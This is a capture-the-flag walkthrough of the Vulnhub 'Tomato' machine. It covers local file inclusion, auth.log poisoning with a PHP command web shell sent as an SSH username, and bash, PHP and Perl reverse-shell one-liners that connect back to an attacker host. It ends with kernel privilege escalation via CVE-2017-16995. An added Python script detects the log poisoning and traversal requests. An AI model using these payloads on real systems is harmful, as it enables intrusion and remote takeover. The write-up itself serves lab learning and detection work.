Vulnhub's Tomato (tomato)
2022-07-03 11:52:00 [Plum_Flowers_seven]
I. Host discovery
II. Port scanning
III. Service version discovery
Two HTTP service ports are open, each behind different middleware.
Port 21 runs FTP
Port 2211 runs the SSH service
The scan also tells us this is an Ubuntu system.

IV. Information gathering
1. Port 80
Sure enough, it is a big tomato. As usual, check the page source for useful business information.

2. Port 8888
A login box. The most classic first attempt, weak passwords, does not succeed.
V. Expanding the attack surface: directory scanning
1. dirsearch with the general wordlist
Nothing. With a bigger wordlist dirsearch runs very slowly, so switch to gobuster.

2. gobuster
Written in Go, so it is fast.
gobuster dir -u http://192.168.0.101 -w /usr/share/seclists/Discovery/Web-Content/common.txt
The 301 status code draws our attention.

VI. Information gathering on /antibot_image
1. Judging from the image, an anti-crawler application is deployed on the server

2. The info.php file
So this is a phpinfo page: it exposes the PHP directive settings, the server environment, the configuration file directory and so on.

3. Source code of info.php
There is an information leak in the comments: it is obviously an include() call, i.e. a file inclusion function.

VII. File inclusion
1. The parameter includes a local file
2. Remote file inclusion
Practice: create a PHP file on Kali and try to include it remotely. Failure.
Condition: simply put, remote file inclusion can include a file from another host and execute it as PHP code.
For remote file inclusion to work, PHP must be configured with allow_url_include = on (enabled).
This can also be seen in phpinfo: it is not enabled.
3. Read the private key through the file inclusion vulnerability
Failure: /home/tomato/.ssh/id_rsa does not exist.
4. Look at the Ubuntu log files
/var/log/auth.log
This is Ubuntu's default log for login failures, so we can inject code through a failed SSH or FTP login.

5. Test
ssh aaaaaaaaaaaa@192.168.0.101 -p 2211
Sure enough, the aaaaaaaaaaaa we entered shows up in the log. Change it into a web shell.

6. Write the command-executing web shell into the log
<?php echo system($_GET['cc'])?>
After this is written, the PHP code itself is not displayed when the log is included, which proves the server has a PHP runtime and the injected script is parsed normally.

7. Parameter test
view-source:http://192.168.0.101/antibot_image/antibots/info.php?image=/var/log/auth.log&cc=id
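Every step of the chain in this section leaves a trace in the very logs it abuses: sshd records the PHP tag as an "invalid user", and the web server records the request whose include parameter points at /var/log/auth.log. The script below is an added detection example, not part of the original write-up or of the Tomato VM; the auth.log and access-log lines are constructed samples in standard sshd and combined-log format, and the parameter names in INCLUDE_PARAMS (only "image" comes from the write-up's URL) are an assumption to adapt to the application being monitored.

```python
"""Added detection example for the log-poisoning chain above (not from the write-up).
Two artefacts are checked: PHP tags planted in auth.log via failed SSH logins, and
web requests whose include parameter points at a log file or traverses directories.
All log lines below are constructed samples."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed auth.log excerpt. Line 3 mirrors the write-up: the SSH "username"
# that sshd faithfully records is a PHP tag.
AUTH_LOG = """\
Jul  3 11:50:01 tomato sshd[1201]: Failed password for tomato from 192.168.0.104 port 50210 ssh2
Jul  3 11:50:07 tomato sshd[1203]: Invalid user aaaaaaaaaaaa from 192.168.0.104 port 50214
Jul  3 11:50:13 tomato sshd[1205]: Invalid user <?php echo system($_GET['cc'])?> from 192.168.0.104 port 50218
"""

# Constructed web access log (combined log format) for the same host.
ACCESS_LOG = """\
192.168.0.104 - - [03/Jul/2022:11:51:00 +0800] "GET /antibot_image/antibots/info.php?image=logo.png HTTP/1.1" 200 512
192.168.0.104 - - [03/Jul/2022:11:51:20 +0800] "GET /antibot_image/antibots/info.php?image=/var/log/auth.log&cc=id HTTP/1.1" 200 9876
192.168.0.104 - - [03/Jul/2022:11:51:30 +0800] "GET /antibot_image/antibots/info.php?image=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2048
"""

PHP_TAG = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)
# Parameter names that feed include(); "image" is the one in the write-up's URL,
# the rest of the list is an assumption to be adapted to the monitored application.
INCLUDE_PARAMS = ("image", "page", "file")
SENSITIVE_PREFIXES = ("/var/log", "/etc", "/proc", "/home", "/root")
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def find_auth_log_poisoning(text):
    """Return [(line_no, line)] for auth.log entries carrying a PHP open tag.
    A legitimate username never contains one, so any hit is worth an alert."""
    return [(n, line) for n, line in enumerate(text.splitlines(), 1)
            if PHP_TAG.search(line)]


def is_suspicious_include(value):
    """True when an include value, after (double) URL-decoding, traverses
    directories or points into a tree the application should never read."""
    decoded = unquote(unquote(value))
    if ".." in decoded:
        return True
    return any(decoded.startswith(prefix) for prefix in SENSITIVE_PREFIXES)


def find_lfi_requests(text):
    """Return [(line_no, include_value)] for requests whose include parameter
    is suspicious. parse_qs already decodes one layer of percent-encoding."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
        for name in INCLUDE_PARAMS:
            for value in query.get(name, []):
                if is_suspicious_include(value):
                    hits.append((n, value))
    return hits


if __name__ == "__main__":
    for n, line in find_auth_log_poisoning(AUTH_LOG):
        print(f"auth.log line {n}: PHP tag in login record -> {line}")
    for n, value in find_lfi_requests(ACCESS_LOG):
        print(f"access log line {n}: suspicious include value -> {value}")
```

Against real files, replace the two constructed strings with the contents of /var/log/auth.log and the web server's access log. Note that allow_url_include = off, which the phpinfo page shows here, only blocks the remote variant of the bug; the local inclusion used in this section works regardless, so the fix belongs in the application (resolve the parameter against a fixed directory and reject anything that escapes it) and in file permissions (the web server user should not be able to read auth.log at all).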

VIII. Reverse shell
In the end the Python reverse shell is the one that succeeded.
1. bash
bash -i >& /dev/tcp/192.168.0.104/4444 0>&1
2. php
php -r '$sock=fsockopen("LISTENER_IP",LISTENER_PORT);exec("/bin/bash -i <&3 >&3 2>&3");'
3. perl
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.0.104:7777");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

IX. Kernel vulnerability enumeration for privilege escalation
1. Tool: linux-exploit-suggester
sudo apt install linux-exploit-suggester
2. Transferring the tool
Server side (listening, on the target):
nc -nvlp 4444 > 1.sh
Client (sending, on Kali):
nc 192.168.0.101 4444 < linux-exploit-suggester.sh -w 1
3. Try the suggested exploits one by one

X. CVE-2017-16995

After compiling with gcc on Kali, upload it with nc, grant execute permission, and finally run it.
